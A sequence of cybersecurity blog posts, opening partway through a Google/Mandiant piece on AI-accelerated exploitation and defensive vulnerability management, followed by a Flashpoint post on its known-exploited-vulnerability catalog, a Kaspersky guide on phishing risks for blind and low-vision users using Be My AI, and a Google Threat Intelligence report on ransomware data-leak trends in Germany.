Historically, the discovery of novel vulnerabilities and the subsequent development of zero-day exploits required significant time, specialized human expertise, and resources. Today, highly capable AI models are increasingly demonstrating the ability to not only identify vulnerabilities but also help generate functional exploits, lowering the barrier to entry for threat actors. Continued advancements in these capabilities will increasingly make exploit development achievable for threat actors of all skill levels, significantly compressing the attack timeline. GTIG has already observed threat actors leveraging LLMs for this purpose as well as the marketing of this capability within AI tools and services advertised in underground forums.
A significant shift in the economics of zero-day exploitation will enable mass exploitation campaigns, ransomware and extortion operations, and an increased volume of activity from actors who previously guarded these capabilities and used them sparingly.
Accelerated exploit deployment is a trend we’ve already been observing among advanced adversaries. In our 2025 Zero-Days in Review report, we noted that PRC-nexus espionage operators have become increasingly adept at rapidly developing and distributing exploits among otherwise separate threat groups. This has significantly shrunk the historical gap between public vulnerability disclosure and widespread mass exploitation, a trend we expect to continue.
This evolving landscape will almost certainly result in meaningful shifts over the coming year:
Scaling Defenses for Machine-Speed Threats
We have long anticipated that AI models would become capable of vulnerability discovery—which is why we’ve been using AI tools like Big Sleep, CodeMender, and OSS-Fuzz to proactively find and fix vulnerabilities over the years.
Now as threat actors leverage AI to significantly multiply their offensive output, enterprise defenders cannot rely on human-speed patching protocols to keep up. When organizations are confronted with an AI-enabled surge in vulnerabilities, traditional security tooling and manual triage will fail to keep pace.
Attempting to absorb this exponential increase in workload using legacy processes will result in severe overload and burnout for security and development teams. The question is no longer just about proactive scanning and adherence to traditional patching SLAs; it is about whether organizations are empowering their workforce with the automation needed to eliminate manual toil. To prepare for this reality, organizations must integrate AI defensively, shifting the role of the security practitioner from manual investigator to strategic coordinator.
A Modern, AI-Integrated Defensive Roadmap
In order to modernize the traditional vulnerability roadmap, organizations must incorporate automation and prioritize resilience.
Organizations are no longer defending against purely human-speed exploitation. AI-enabled adversaries can identify, chain, and weaponize weaknesses faster than traditional vulnerability management programs were designed to respond. A modern roadmap should therefore emphasize automation, resilience, and continuous validation.
This roadmap is organized in two parts. The first outlines advanced modernization priorities for organizations that are ready to evolve their security programs to achieve defense at AI enabled speeds. The second provides foundational guidance for organizations that are still building core vulnerability management capabilities.
Advanced Modernization Priorities
Secure Your Code
Organizations have historically focused on patching and securing tangible assets like laptops, servers, and network infrastructure. In today’s threat landscape, that same discipline must be applied to source code, code libraries, and the systems used to build and deploy it.
Code repository platforms should be tightly protected and accessible only through trusted internal networks, managed identities, or other strongly controlled access paths. Organizations should proactively scan for secrets within their codebase that may be weaponized by adversaries and eliminate any practice of storing sensitive credentials in plaintext.
Similarly, organizations are still accountable for vulnerable code from their supply chains, and they must proactively plan for and defend against attacks through exploitation of compromised code libraries. This creates a conflict with updating versions and repositories immediately against holding onto known and trusted versions.
Accordingly, security controls should cover build runners, CI/CD pipelines, and other automated execution mechanisms, which are increasingly attractive targets for threat actors. AI-enabled scanning tools can help teams detect critical vulnerabilities faster and uncover groups of weaknesses that may appear minor on their own but could be chained together for exploitation.
Organizations should leverage frameworks like Wiz SITF to map their SDLC threat model and identify "attack chains" where minor, isolated weaknesses are combined by AI to create a critical breach. Additionally, one-time static or dynamic scanning is no longer sufficient. Organizations should deploy emerging commercial and open-source agentic solutions to review code and mitigate flaws before they can be exploited.
Move to Automated Security Operations
Traditional dashboards and static detection rules will struggle under the volume of automated attacks. Security operations need to become more dynamic, with a clear path toward an agentic SOC.
Legacy models are often reactive and constrained by manual workflows, By deploying specialized AI agents such as Google Cloud’s Triage and Investigation Agent and Gemini in Google Security Operations, teams can automate alert triage, analyze suspicious code without manual reverse engineering, correlate signals across multiple tools, and generate response playbooks in real time. This allows analysts to spend less time on repetitive investigation and more time on high-value decisions, helping the SOC respond to AI-enabled attacks at AI speed.
Reduce Attack Surface
Organizations should design networks with a zero trust approach and focus first on reducing exposure across internet-facing systems, critical infrastructure, control planes, and trusted service infrastructure.
Network segmentation and identity-based access controls should be in place so that if an edge device is compromised through a zero-day exploit, the blast radius is limited and easier to contain.
Maintain Continuous Asset Discovery and Posture Management
Unidentified assets are a major blindspot for organizations and a critical weakness that AI-enabled threat actors are able to exploit with increasing efficiency. Static spreadsheets and manual asset tracking are no longer a viable and scalable strategy.
Security teams need a continuously updated, automated inventory covering endpoints, servers, public-facing systems, network infrastructure, AI systems, cloud environments and ephemeral assets like Kubernetes pods. Dynamic asset discovery is critical for reducing blind spots and shadow AI. The more seamlessly known assets can be fed into downstream security tooling, the more accurate and effective frontline detection and response will be.
Expand Automated Scanning Coverage
Automated vulnerability scanning should cover every major operating system in use, including Windows, macOS, and Linux, across both endpoints and servers.
Reduce blind spots and maintain continuous, comprehensive visibility into vulnerabilities. Where possible, that visibility should feed directly into automated remediation pipelines.
Enhance Network Device Patching and Limit Connectivity
Organizations need a highly automated, repeatable process for identifying missing firmware and security updates on network devices and for scheduling maintenance efficiently. Network infrastructure has long been a preferred target for sophisticated threat actors, and AI will only accelerate the discovery of weaknesses in these often-overlooked systems.
Organizations should use perimeter controls to block unnecessary outbound connections from internal network devices. Any attempt by those devices to communicate externally should be investigated to determine whether it is required for normal operations or signals something more concerning. Proactively, organizations should baseline what outbound connections are normal, in order to alert against anomalies.
Formalize Emergency Remediation SLAs
AI may help accelerate patching, but emergency response still depends on clear human processes.
Organizations should define remediation SLAs based on severity, exposure, and asset criticality, and those expectations should be aligned across security, IT, and business stakeholders. When a vulnerability is being actively exploited in the wild, teams need a pre-approved, low-friction process to apply temporary mitigations, such as restricting public access or isolating affected systems, while permanent fixes are validated. Extremely critical business processes should each have secondary systems that can deliver the same objectives with different underlying technology. By having alternatives and fall backs for these processes, organizations give themselves more options to address emergency remediation while minimizing potential business disruption.
Secure AI Agents and Implement SAIF
As organizations deploy AI agents, they also create a new attack surface that must be protected.
Organizations should adopt frameworks such as Google’s Secure AI Framework (SAIF) to guide the secure deployment of AI models and applications. Tools like Google Cloud Model Armor or similar industry solutions can also serve as a protective layer for large language model environments by screening inputs and outputs for prompt injection, jailbreak attempts, and Google Cloud Sensitive Data Protection can prevent sensitive data leakage. Locking down connections that AI systems can establish such as MCP, with fine grained IAM roles is critical to prevent from insecure plugin use threats.
Defensive AI systems cannot become another point of compromise, and they should be secured accordingly.
Foundational Vulnerability Management Priorities
Not every organization starts from the same baseline. The priorities above assume a relatively mature security program with established tooling, ownership, and operational capacity. For organizations with limited or inconsistent vulnerability management capabilities, the first step is to build a reliable foundation before pursuing advanced AI-enabled operating models.
The Current Reality of Vulnerability Management
Vulnerability management programs vary widely based on the maturity of an organization’s overall security program. In more mature environments, vulnerability management is highly automated: in-scope vulnerabilities are identified, routed to the appropriate IT, infrastructure, or application owners, and automatically validated once remediation is complete.
In less mature environments, the opposite is often true. Vulnerability management may be inconsistent, narrowly scoped, and focused primarily on the highest-profile zero-days. Tracking may still rely on local spreadsheets, systems may be overlooked, and even trusted service infrastructure assets such as Active Directory domain controllers may remain unpatched.
Such organizations need to immediately modernize and elevate their vulnerability management programs. Most organizations were already unable to remediate every vulnerability across their technology stack, and the rise of AI-enabled threats worsens that reality, increasing the urgency of building programs that are automated, measurable, tracked, and validated.
Achieving that outcome is challenging. It requires coordination across the three foundational pillars of any security program: people, process, and technology. A prioritized and phased approach is outlined as follows.
Foundation Step #1 — Baseline Current State
Begin with the tools, processes, and coverage already in place. Scan everything currently in scope, identify Critical and High findings, and remediate them according to agreed urgency and service levels. At the same time, establish a process for tracking vulnerabilities that are being actively exploited in the wild, along with the emergency patching actions they may require. This phase should also confirm that system owners have defined maintenance windows and the operational support needed to meet remediation SLAs.
Foundation Step #2 — Expand System Scanning Coverage
Broaden vulnerability scanning across all major operating systems in use, including Windows, macOS, and Linux, for both endpoints and servers. Additionally, expand coverage to include other network attached systems, including the network devices themselves.The objective is to reduce blind spots and ensure vulnerability visibility extends across the environment, rather than covering only isolated segments.
Foundation Step #3 — Confirm Asset Inventory and Ownership
Maintain a simple, accurate inventory of key asset classes, including endpoints, servers, public-facing systems, network infrastructure, and specialized devices such as medical equipment where applicable. Every asset should have a clearly defined owner responsible for remediation coordination, exception handling, and lifecycle accountability.
Foundation Step #4 — Establish Standard Program Reporting
Create a consistent reporting cadence that gives stakeholders a clear view of program health and risk. Reporting should include scanning coverage by asset class, top Critical and High vulnerabilities, public-facing exposure, patch compliance, SLA performance, and documented exceptions or risk acceptances. The goal is to produce reporting that drives decisions, not just dashboards that provide visibility.
Foundation Step #5 — Prioritize Public-Facing and High-Risk Vulnerabilities
Identify the attack surface and prioritize vulnerabilities affecting internet-exposed systems, critical infrastructure, and assets that present the highest likelihood of exploitation or business impact. Remediation should be tracked against defined deadlines, with clear escalation paths when timelines are at risk. Where possible, internet-exposed systems should be engineered for automatic patching.
Foundation Step #6 — Develop a Specialized Process for High-Sensitivity Devices
For device classes that require additional coordination, such as medical devices, industrial control systems, or other operational technology, create a streamlined process for identifying vulnerabilities, coordinating with vendors or support teams, and applying compensating controls when patching is not feasible. These assets often require a different remediation model than standard IT systems.
Foundation Step #7 — Formalize Remediation SLAs and Exception Handling
Define remediation SLAs based on severity, exposure, and asset criticality, and ensure they are understood across security, IT, and business stakeholders. Just as importantly, establish a formal exception process for situations where remediation cannot be completed within the required timeframe. Exceptions should be documented, risk-assessed, approved by the appropriate stakeholders, and reviewed on a recurring basis.
How Google Can Help
In today’s cybersecurity landscape, we’re not just defending against human attackers, but also against tactics supercharged by AI tools. To counter these machine-speed threats, Google provides a comprehensive, AI-integrated defensive ecosystem:
-
Google Threat Intelligence: To combat the unprecedented volume of AI-generated exploits, Google Threat Intelligence enables a proactive 'assume breach' mentality. By fusing Mandiant’s codified frontline adversarial behaviors with Google’s global visibility of the threat landscape, security teams can move beyond static indicators to hunt for the subtle, non-linear behaviors characteristic of novel attacks. As both security noise and true threats escalate, the platform helps organizations better prioritize security resources based on active threats. By cutting through this growing noise to focus on what is truly important, security teams save time, ultimately empowering them to disrupt the adversary’s lifecycle long before they can reach their objective.
-
Mandiant Security Consulting Services: Mandiant AI Security Consulting Solutions can help organizations design and operationalize this architecture. This includes helping organizations speed the identification and remediation of vulnerabilities through code reviews, mature their secure software development lifecycles (SSDLCs), and modernize the overall vulnerability management programs to handle the anticipated influx of vulnerabilities with greater efficiency and resilience.
-
Agentic SecOps: Google SecOps provides the foundation for an agentic security operations center. This allows teams to augment workflows with agents, combining dynamic AI with deterministic automation. Users can embed agents like the Triage and Investigation agent directly into workflows to accelerate response times. This agent autonomously investigates alerts, gathers evidence, and provides verdicts with clear explanations. This enables automated decision-making and remediation, freeing analysts to focus on high-priority threats rather than false positives. Orchestrating responses becomes more efficient as friction is reduced. Additionally, customers can build enterprise-ready security agents with remote Model Context Protocol (MCP) server support.
-
Mandiant Threat Defense (MTD): To augment internal teams, Mandiant Threat Defense leverages frontline intelligence and AI-enabled telemetry to proactively hunt for and disrupt advanced, machine-speed threats.
-
Wiz: Organizations can maintain continuous asset discovery and dynamic posture management, ensuring they can rapidly identify and reduce their attack surface across complex, multi-cloud environments.Wiz uses AI agents, powered by environmental context, to democratize security, prioritize remediation, and proactively reduce the attack surface. Wiz continuously integrates the latest AI models to streamline vulnerability detection and response, and its Model Context Protocol (MCP) server enables security teams to use Wiz’s deep context and risk analysis in agentic workflows. The foundational strategy of Wiz connects cloud, code, and runtime, and employs three key agents:
-
Shift Right (Red Agent): Scans the entire attack surface with an AI-powered attacker, using contextual information (cloud, workload, code analysis) to discover immediately exploitable risks.
-
Shift Left (Green Agent): Helps customers identify root causes (cloud-to-code) and automatically deploy fixes using pre-built Wiz skills, and upcoming integrations with CodeMender to self-heal code bases.
-
Detect and respond (Blue Agent): Automates the investigation of AI-enabled attacks at the speed of AI, allowing SOC teams to rapidly triage suspicious behavior and utilize runtime protection tools to detect exploitation.
-
Google Cloud Model Armor: To secure the AI agents organizations deploy, Google Cloud Model Armor acts as a specialized LLM firewall, proactively screening inputs and outputs to block prompt injections and sensitive data leaks.
Outlook and Implications
The cybersecurity community has the opportunity to serve as the voice of reason: the best response is proactive, disciplined preparation, not panic. While access to the publicly known, most capable frontier models is currently restricted to responsible actors, the availability of these technologies to a broader audience is inevitable. For defenders, this signals a surge in vulnerability management demands. The traditional window between a vulnerability’s disclosure and its active exploitation in the wild has already largely vanished; the primary concern now is the sheer number of exploits organizations will have to defend against simultaneously. Furthermore, the traditional concept of severity is shifting. In a landscape where AI agents can chain together multiple low-level vulnerabilities, the practical impact difference between a remote code execution (RCE) flaw and a seemingly benign local-only exploit is rapidly disappearing.
To build on the foundational steps above, organizations can work with Mandiant to plan, prioritize, and implement an AI-enabled cyber defense strategy. AI gives security teams powerful new ways to understand their environments, automate remediation at scale, and strengthen workforce capabilities. By adopting AI-integrated defenses today, organizations can better prepare for the speed, scale, and sophistication of tomorrow’s adversaries.
Acknowledgement
This post wouldn't have been possible without numerous experts across Mandiant and GTIG. We specifically would like to thank Omar ElAhdan, Chris Linklater, Austin Larsen, Jared Semrau, Dan Nutting, John Hultquist, and Kimberly Goody for their contributions to this blog post.
Flashpoint Surpasses Cataloging 7,000 Known Exploited Vulnerabilities as Disclosure Volume Accelerates
Blog
Flashpoint Surpasses Cataloging 7,000 Known Exploited Vulnerabilities as Disclosure Volume Accelerates
In this post we explore Flashpoint’s latest milestone of surpassing cataloging 7,000 known exploited vulnerabilities and what this means for security teams.

Flashpoint Vulnerability Intelligence has surpassed cataloging 7,000 known exploited vulnerabilities, surpassing another major milestone as vulnerability disclosures accelerate across the global attack surface.
In 2025, Flashpoint tracked 44,509 disclosed vulnerabilities, a pace that continues to accelerate into 2026. Of those, 14,593 had publicly available exploits (1,944 more with proof-of-concepts), giving threat actors immediate pathways to weaponization.

This pace is shaping how exploitation unfolds, with high-impact vulnerabilities being operationalized within hours or days, particularly when they affect widely deployed technologies or core infrastructure.
Security teams are operating within this compressed environment every day. They are reviewing more findings across open-source software, commercial applications, cloud environments, and third-party dependencies, while working within tighter timelines to assess impact and take action.
Flashpoint’s latest milestone of surpassing 7,000 known exploited vulnerabilities (KEVs) cataloged reflects that reality. It highlights how vulnerability management programs are evolving toward prioritization as a core capability, with a focus on vulnerabilities tied to active exploitation and real-world risk.
What The 7,000+ KEV Milestone Means for You
Security teams are operating in a high-volume environment. Vulnerabilities are disclosed continuously across open-source software, commercial applications, cloud environments, and third-party dependencies. At the same time, advancements in automation and code analysis are increasing the rate at which new findings are surfaced.
Each of these findings enters an already crowded workflow. Teams are expected to determine relevance, urgency, and impact quickly, often with limited context. This is where risk-based decision making becomes essential.
Flashpoint tracks hundreds of thousands of vulnerabilities across thousands of sources. Within that dataset, a much smaller percentage shows confirmed exploitation activity. That concentration of risk informs how effective programs allocate time and resources.
Crossing the 7,000+ KEV milestone goes beyond scale to provide greater precision, deeper context, and stronger confidence in how teams prioritize and act on the most critical vulnerabilities.
- Validated threats: Each KEV entry reflects observed exploitation in the wild by threat actors, including APT groups, cybercriminal operations, ransomware presence, and automated botnets.
- Exploit-aware prioritization: In reality, only a small percentage of tracked vulnerabilities drive real-world incidents. FP KEV provides visibility into that subset so teams can focus remediation efforts where they have immediate impact.
- Human-curated intelligence: Every entry is reviewed, validated, and enriched by analysts, with context on exploit maturity, adversary usage, and remediation pathways when available.
This level of clarity allows teams to move faster without sacrificing accuracy. It supports vulnerability management programs that are built around real-world attacker behavior and aligned to current risk.
How Public Vulnerability Data Fits Into the Picture
Public vulnerability catalogs remain useful reference points for tracking disclosures and confirmed exploitation. The CISA Known Exploited Vulnerabilities catalog, for example, gives security teams a curated view into a limited set of vulnerabilities that have been exploited in the wild that impact U.S. government stakeholders.
For many organizations, though, that level of visibility is not enough.
Public catalogs capture only part of the picture. They tend to reflect a narrower slice of exploitation activity, with less detail on how vulnerabilities are being used, which actors are leveraging them, and what defenders should do next. They also rely heavily on CVE-based tracking, leaving gaps around non-CVE exposures and other vulnerabilities that still carry operational risk.
Flashpoint’s FP KEV and Vulnerability Intelligence provide a broader and more actionable view. The advantage is visible in both scale and depth. Of the 7,000 known exploited vulnerabilities in FP KEV, over 800 are missing from CVE. That expanded coverage is paired with the context security teams need to prioritize effectively, including exploit maturity, adversary mapping, affected product detail, and remediation guidance.
| Dimension | Public KEV Catalogs | Flashpoint FP KEV |
| Scope | Varies by provider, with coverage dependent on available sources and methodology | Global, cross-industry coverage |
| Coverage | CVE-based tracking | CVE and non-CVE vulnerabilities |
| Context | Limited enrichment | Exploit maturity, adversary mapping, remediation |
| Update Model | Periodic updates | Continuously updated with analyst input |
This is what separates a reference list from an operational dataset. Teams need vulnerability intelligence that supports triage, remediation, reporting, and broader risk reduction efforts. Wider visibility and deeper context make that possible.
The Critical Role of Human-Curated Intelligence
Vulnerability data originates from a wide range of sources with varying levels of completeness and accuracy.
Flashpoint’s intelligence model includes analyst validation to ensure consistency and depth across the dataset.
This process includes:
- Reviewing disclosures across public and private sources
- Validating exploit availability and usage
- Enriching entries with technical and operational context
Analyst input supports:
- Accurate classification of vulnerabilities
- Clear understanding of exploitation pathways
- Timely updates as activity evolves
Supporting Decision-Making Across Teams
Vulnerability intelligence feeds multiple functions across an organization. Teams use this data to align technical actions with current threat activity.
Common use cases include:
- Vulnerability management: Align patching priorities with active exploitation trends.
- Threat intelligence: Map vulnerabilities to threat actor campaigns and observed behaviors.
- Security operations: Tune detection based on known exploit techniques.
- Executive reporting: Communicate risk posture using data tied to real-world activity.
Each of these functions relies on consistent, enriched intelligence to maintain alignment.
Proactively Address Vulnerability Risk
Vulnerability discovery continues to expand across software ecosystems, infrastructure, and identity layers.
Security teams require a clear understanding of which issues are relevant to their environment at any given time.
Flashpoint provides primary source intelligence that supports this need through:
- Continuous monitoring of vulnerability disclosures and exploitation
- Analyst-driven validation and enrichment
- Integration-ready data for operational workflows
This approach enables teams to maintain focus, allocate resources effectively, and respond to risk based on current threat activity. Request a demo and learn more today.
Begin your free trial today.
The post Flashpoint Surpasses Cataloging 7,000 Known Exploited Vulnerabilities as Disclosure Volume Accelerates appeared first on Flashpoint.
Spotting cyberthreats: a guide for blind and low-vision users | Kaspersky official blog
In 2023, Tim Utzig, a blind student from Baltimore, lost a thousand dollars to a laptop scam on X. Tim had been a long-time follower of a well-known sports journalist. When that journalist’s account started posting about a “charity sale” of brand-new MacBook Pros, Tim jumped at the chance to get a deal on a laptop he needed for his studies. After a few quick messages, he sent over the money.
Unfortunately, the journalist’s account had been hacked, and Tim’s cash went straight to scammers. The red flags were strictly visual: the page had been flagged as “temporarily restricted”, and both the bio and the Following list had changed. However, Tim’s screen reader — the software that converts on-screen text and graphics into speech — didn’t announce any of those warnings.
Screen readers allow blind users to navigate the digital world like everyone else. However, this community remains uniquely vulnerable. Even for sighted users, spotting a fake website is a challenge; for someone with a visual impairment, it’s an even steeper uphill battle.
Beyond screen readers, there are specialized mobile apps and services designed to assist the blind and low-vision community, with Be My Eyes being one of the most popular. The app connects users with sighted volunteers via a live video call to tackle everyday tasks — like setting an oven dial or locating an object on a desk. Be My Eyes also features integrated AI that can scan and narrate text or identify objects in the user’s environment.
But can these tools go beyond daily chores? Can they actually flag a phishing attempt or catch the hidden fine print when someone is opening a bank account?
Today we explore the specific online hurdles visually impaired users face, when it makes sense to lean on human or virtual assistants, and how to stay secure when using these types of services.
Common cyberthreats facing the blind and low-vision community
To start, let’s clarify the difference between these two groups. Low-vision users still rely on their remaining sight, even though their visual function is significantly reduced. To navigate digital interfaces, they often use screen magnifiers, extra-large fonts, and high-contrast settings. For them, phishing sites and emails are particularly dangerous. It’s easy to miss intentional typos — known as typosquatting — in a domain name or email address, such as the recent example of rnicrosoft{.}com.
Blind users navigate primarily by sound, using screen readers and specific touch gestures. Interestingly, though, unlike those with low vision, blind users are more likely to spot a phishing site using a screen reader: as the software reads the URL aloud, the user will hear that something is off. However, if a service — whether legitimate or malicious — isn’t fully compatible with screen readers, the risk of falling victim to a scam increases. This is exactly what happened to Tim Utzig.
It’s important to remember that screen magnifiers and readers are basic accessibility tools. They’re designed to enlarge or narrate an interface — not act as a security suite. They can’t warn the user of a threat on their own. That’s where more advanced software — tools that can analyze images and files, flag suspicious language, and describe the broader context of what’s happening on-screen — comes into play.
When to lean on an assistant
Be My Eyes is a major player in the accessibility space, boasting around 900 000 users and over nine million volunteers. Available on Windows, Android, and iOS, it bridges the gap by connecting blind and low-vision users with sighted volunteers via video calls for help with everyday tasks. For example, if someone wants to run a Synthetics cycle on their washing machine but can’t find the right button, they can hop into the app. It connects them with the first available volunteer speaking their language, who then uses the smartphone’s camera to guide them. The service is currently available in 32 languages.
In 2023, the app expanded its capabilities with the release of Be My AI — a virtual assistant powered by OpenAI’s GPT-4. Users take a photo, and the AI analyzes the image to provide a detailed text description, which it also reads aloud. Users can even open a chat window to ask follow-up questions. This got us thinking: could this AI actually spot a phishing site?
As an experiment, we uploaded a screenshot of a fake social media sign-in page to Be My Eyes. On a phone, you can do this by selecting a photo in your gallery or files, hitting Share, and choosing Describe with Be My Eyes. In Windows, you can upload a screenshot directly.

An example of a phishing page that mimics the Facebook sign-in form. Note the incorrect domain in the address bar
At first, the AI gave us a detailed description of the page. We then followed up in the chat: “Can I trust this page?” The AI flagged the domain name error immediately, advised us to close the fake login page, and suggested typing the official URL directly into the browser, or to use the official Facebook app.

Be My AI explains why the page looks sketchy: the domain doesn’t match the official site. The app suggests typing the official URL directly into the browser, or using the official Facebook app
We saw the same positive results when testing a phishing email. In fact, the AI flagged the scam during its initial description of the message. It wrapped up with a warning: “This looks like a suspicious email. It’s best not to open any attachments or click any links. Instead, navigate to the official website or app manually, or call the number listed on their official site”.
Beyond just spotting cyberthreats, Be My AI is a solid sidekick for navigating online stores, banking apps, and digital services. For instance, the AI can help you to:
- Read descriptions, names, and prices when a store’s website or app doesn’t support screen readers or large fonts
- Scan those tricky terms and conditions — often buried in tiny text or otherwise inaccessible to a screen reader — when you’re signing up for a subscription or opening a bank account
- Pull key info directly from product cards or instruction manuals
The risks of relying on Be My AI
The most common hiccup with AI is hallucinations, where the language model distorts text, skips crucial details, or invents words out of thin air. When it comes to cyberthreats, an AI’s misplaced confidence in a malicious site or email can be dangerous. Furthermore, AI isn’t immune to prompt injection attacks, which scammers use to trick AI agents beyond just Be My AI.
Even though the AI passed our test, you shouldn’t rely on it unquestioningly. There’s no guarantee it’ll get it right every time. This is a vital point for the blind and low-vision community, as a neural network can often feel like the only eyes available.
At the end of every response, Be My AI suggests checking in with a volunteer if you’re still unsure. However, when you’re trying to spot a fake webpage, we advise against this. You have no way of knowing how tech-savvy or trustworthy a random volunteer might be. Besides, you risk accidentally exposing sensitive data like your email address or password. Before connecting with a stranger, make sure they won’t see anything confidential on your screen. Better yet, use the app’s dedicated feature to create a private group of family, friends, or trusted contacts. This ensures your video call goes to people you actually know, rather than a random volunteer.
To stay safe, we recommend installing a trusted security tool on all your devices. These programs are designed to block phishing attempts and prevent you from landing on malicious sites. Another practical recommendation for visually impaired users is to use a password manager. These apps will only auto-fill credentials on the legitimate, saved website; they won’t be fooled by a clever domain spoof.
How Be My AI handles and stores your data
According to the Be My Eyes privacy policy, video calls with volunteers may be recorded and stored to provide the service, ensure safety, enforce the terms of service, and improve the products. When you use Be My AI, your images and text prompts are sent to OpenAI to generate a response. This data is processed on servers located in the U.S., and OpenAI uses it only to fulfill your specific request. The policy explicitly states that user images and queries aren’t used to train AI models.
Photos and videos are encrypted both in transit and at rest, and the company takes steps to strip away sensitive information. It’s worth noting that video call recordings can be retained indefinitely unless you request their deletion — in which case they’re typically wiped within 30 days. Data from Be My AI interactions is stored for up to 30 days unless you delete it manually within the app. If you decide to close your account, your personal data may be held for up to 90 days. At any time, you can opt out of data sharing, or request the deletion of your existing data by contacting the Be My Eyes support team.
How to use Be My Eyes safely
Despite Be My Eyes’ claims regarding privacy, you should still follow a few ground rules when using the service:
- Use Be My AI for a first-pass on suspicious emails or pages, but don’t treat it as the only source of truth. Specialized security software is better at identifying and neutralizing threats.
- If a site, email, or message feels off, don’t touch any links or attachments. Instead, manually type the official website address into your browser, or open the official app to verify the info.
- Remember: a volunteer sees exactly what your camera sees. Make sure it isn’t capturing things it shouldn’t, like a safe code or an open passport. Avoid sharing your name, showing your face, or revealing too much of your surroundings. Be extra careful about reflections that might show you or your personal details. Only show what is absolutely necessary for the task at hand.
- Stick to your inner circle. Create a group in the app and add your friends and family. This ensures your video calls go to people you know — not a random volunteer.
- Don’t use Be My AI to read documents that contain confidential info. Remember, your images and text prompts are sent to OpenAI for processing and generating a response.
- Remember to delete chats you no longer need. Otherwise, they’ll hang around for 30 days.
- If you need to read something personal or confidential, consider apps with real-time reading features like Envision, Seeing AI, or Lookout. These apps process data locally on your device rather than sending it to the cloud.




The German Cyber Criminal Überfall: Shifts in Europe's Data Leak Landscape
Written by: Jamie Collier, Robin Grunewald
Germany has reclaimed its position as a primary focus for cyber extortion in Europe. While data leak site (DLS) posts rose almost 50% globally in 2025, Google Threat Intelligence (GTI) data shows that the surge is hitting German infrastructure harder and faster than its regional neighbors, marking a significant return to the high-pressure levels previously observed in the country during 2022 and 2023.
Cyber Criminals Pivoting Back to Germany
Germany moved to the forefront of European data leak targets in 2025. Following a 2024 period where the UK led in DLS victims, this pivot reflects a resurgence of the intense pressure observed across German infrastructure during 2022 and 2023.
This targeting is not a result of the overall number of companies within Europe, as Germany has fewer active enterprises than France or Italy. Instead, its sustained appeal to extortion groups is driven by its status as an advanced European economy with an increasingly digitized industrial base.
Figure 1: Percentage of data leaks affecting European nations in 2025
The speed of this escalation is particularly notable. Following a relative cooling of activity in 2024, Germany saw a 92% growth in leaks in 2025—a growth rate that tripled the European average.
Figure 2: The number of German victims listed in data leak sites grew 92% in 2025 compared to 2024
While several factors influenced European ransomware trends in 2025, a striking contrast emerged in leak volumes. While shaming-site postings for UK-based organizations cooled, non-English speaking nations (particularly Germany) witnessed a surge. This shift reflects a convergence of several factors. The continued maturation of the cyber criminal ecosystem, including the use of AI to automate high-quality localization, is further eroding the historical protection offered by language barriers. However, this "linguistic pivot" is also supported by a shift in victim profiles. As larger "big game" targets in North America and the UK improve their security posture or utilize cyber insurance to resolve incidents privately, threat actors appear to be pivoting toward the "ripe markets" of the German Mittelstand (discussed in further detail later in this post).
Google Threat Intelligence Group (GTIG) has also observed multiple cyber criminal groups post advertisements, seeking access to German companies and offering a proportion of any extortion fees obtained from victims. For example, dating back to November 2024, the threat actor known as Sarcoma has targeted businesses across several highly developed nations, including Germany.
Figure 3: A forum post by an actor seeking a partnership to target German victims
While the 2025 data marks a record year for German leak volume, it is important to contextualize these figures with a degree of caution. Relying solely on DLS numbers can be misleading, as threat actors typically only post victims who refuse to initiate or complete extortion negotiations. Public reporting on the decline in ransom payment rates may be partially fueling the steady increase in shaming site posts as a secondary pressure tactic. Consequently, while the surge in Germany remains a critical trend, these metrics should be viewed as one component of a broader, more complex threat landscape.
The Diversifizierung of the Cyber Criminal Ecosystem
2025 was characterized by significant turbulence in the cyber criminal ecosystem, driven by internal conflicts and aggressive law enforcement actions against dominant "big game" operations like LOCKBIT and ALPHV. The resulting vacuum at the top of the ransomware market has led to a more crowded field of agile, mid-tier DLS brands. In Germany, this rebalancing is highly visible: as established brands receded, a wider pool of competitors emerged to absorb the market share.
Figure 4: German victims on data leak sites rose sharply in 2025
Following the disruption of LockBit, groups such as SAFEPAY and Qilin have gained significant prominence within the German landscape. SAFEPAY, in particular, claimed breaches of 76 German companies in 2025—accounting for 25% of all German victim posts that year. Meanwhile, Qilin tripled its operational tempo in Germany during Q3 2025. While this increase aligns with Qilin's broader global uptick in activity, their consistent focus on German targets (including 13 victims posted already in early 2026) demonstrates that their presence in the German landscape grows in lockstep with their global expansion.
Figure 5: Leaked data of a German company (name redacted) by SafePay
No Such Thing as Too Small: Targeting of the Mittelstand
There is a persistent myth that small businesses are "too small" to be targeted, a perception often fueled by the fact that large global corporations often dominate cyber crime headlines. However, the 2025 data tells a different story: organizations with fewer than 5,000 employees accounted for 96% of all ransomware leaks in Germany. While this figure largely aligns with the structural composition of the German economy, it underscores a concerning disconnect between public perception and actual targeting patterns. While "big game" hits make the news, the high volume of leaks among medium- and small-sized victims proves they are highly attractive targets for cyber criminals—often because they lack the extensive security personnel and specialized resources of their larger counterparts.
The targeting of the Mittelstand creates a significant secondary risk for large German enterprises and multinationals. While a major corporation may have robust defenses, its broader ecosystem of suppliers and contractors often manages sensitive data or maintains privileged network access. To address these systemic gaps, large enterprises must evolve from passive monitoring to a proactive third-party risk management framework, implementing vendor tiering and enforcing multifactor authentication to neutralize the lateral movement favored by modern cyber criminals.
Figure 6: Size of victim organizations found on data leak sites
Targeting Beyond the Assembly Line
Germany's industrial base remains the primary focus for cyber criminals with manufacturing accounting for 23% of all dark web leaks in 2025. However, the German cyber criminal landscape is characterized by its variety, with legal & professional services (14%), construction & engineering (11%), and retail (10%) all targeted.
The most notable shift in the 2025 data is the growth within the legal & professional services sector. This increase is likely intentional: these firms represent high-value targets because they serve as trusted custodians of sensitive client data, including intellectual property, financial strategies, and M&A plans. This allows cyber criminals to extract significant extortion payments beyond their primary victim and gain downstream leverage over an entire client base.
Figure 7: Data leak victims in Germany by industry
Outlook
The data from 2025 reveals that the recent surge in German leaks is not an isolated incident, but a return to the high-pressure levels previously observed in 2022 and 2023. This resurgence reflects a more volatile and linguistically diverse European threat landscape going into 2026. The 92% growth in German leaks, tripling the European average for 2025, proves that non-English-speaking nations remain a primary target for global extortion groups.
The disruption of established brands like LockBit has rebalanced the ecosystem into a crowded field of agile data leak sites, such as SafePay and Qilin. These groups appear to be hitting Germany in lockstep with their global expansion, identifying the Mittelstand and German professional services as high-volume, target-rich environments. As threat actors continue to exploit complex supply chains, smaller organizations will remain critical pivot points for those aiming at the top of the industrial stack.
